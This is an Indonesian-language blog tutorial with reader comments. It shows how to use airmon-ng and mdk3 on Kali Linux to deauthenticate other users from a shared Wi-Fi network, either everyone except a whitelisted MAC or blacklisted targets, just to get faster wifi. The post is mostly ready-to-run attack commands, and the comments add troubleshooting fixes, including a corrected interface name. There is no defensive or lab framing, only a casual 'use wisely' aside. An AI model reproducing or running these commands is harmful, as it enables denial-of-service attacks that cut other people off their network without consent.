Kalian pasti kesel kan broo, pas lagi enak'' wifian tiba-tiba jaringan menjadi lelet karena banyak user yg online, bagi kalian pengguna kali linux, nih ane kasih trik cara memutus koneksi orang lain dengan mdk3
langsung praktek aj ya :D

Pertama lihat dulu jenis interface di Kali Linux kalian
airmon-ng
Memutus Koneksi orang lain dengan mdk3 di Kali Linux

setelah mengetahui jenis interface, selanjutnya aktifkan monitoring interface dengan cara
airmon-ng start wlan0
airmon-ng start wlan0

Gambar di atas menunjukkan monitor mode yg aktif adalah  mon0
Lalu lihat mac address kali linux kalian ,mac address berada di belakang tulisan HWaddr
ifconfig wlan0
ifconfig wlan0

Setelah mengetahui mac address kalian,
kemudian simpen mac address pada file whitelist.txt
   echo mac address >> whitelist.txt
echo mac address >> whitelist.txt

Sekarang kita jalankan perintah mdk3
mdk3 mon0 d -w whitelist.txt
mdk3 mon0 d -w whitelist.txt

perintah di atas adalah memutus semua koneksi ,kecuali punya kita sendiri atau mac address yang ada di whitelist yang bisa konek,jika ingin memutus hanya beberapa user,kalian harus membuat file backlist.txt dan isi mac addres yg ingin di putus koneksinya.
selanjutnya jalankan perintah
mdk3 mon0 d -b blacklist.txt
untuk perintah-perintah mdk3 yang lain kalian bisa lihat dengan cara mengettiikkan
mdk3 --fullhelp
gunakan dengan bijak ya bro :D 

Posting Komentar

  1. keren gan, toturialnya simple , salam kenal gan,

    BalasHapus
  2. Mantap gan :D
    Kunbal deh : www.kriviks-site.blogspot.com :-d

    BalasHapus
  3. kenapa muncul mdk3 command not found

    BalasHapus
  4. ioctl(SIOCGIFINDEX) failed: No such device

    BalasHapus
  5. cara mengembalikan seperti semula gimana bro?

    BalasHapus
  6. Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

    BalasHapus
  7. nah cara aktifinnya lag gmn?

    BalasHapus
  8. gan mau tanyaa ni. cara baru istall kali linux x terbaru
    tapi pas saya jalankan airmon-ng start wlan0. tiba menu untuk wifinyaa hilang.mohon bantuannya

    BalasHapus
    Balasan
    1. memang untuk netcut harus mode monitor, kalau nak mau logo wifi kembali tinggal ketik ajah airmon-ng stop wlan0 atau airmon-ng stop wlan0mon atau airmon-ng stop mon0

      Hapus
  9. Ane coba bantu jawab ya om anher.. mohon koreksi juga kalo salah :D Bagi teman2 yang mencoba tutor ini dan error saat menjalankan perintah " mdk3 mon0 d -w whitelist.txt " muncul seperti ini:
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device

    Solusinya: tambahin wlan0mon, jadinya " mdk3 wlan0mon d -w whitelist.txt "

    Terus ada lagi pertanyaan cara mengembalikan seperti semula gmn?
    caranya: airmon-ng stop wlan0mon
    jika signal wifi blm muncul setelah perintah diatas, ketik lg perintah: service NetworkManager restart

    Seperti kata om anher, gunakan dgn bijak ya bro :D
    Happy Hacking manteman..

    BalasHapus
  10. Kok lama putus koneksinya kang?

    BalasHapus

 
Top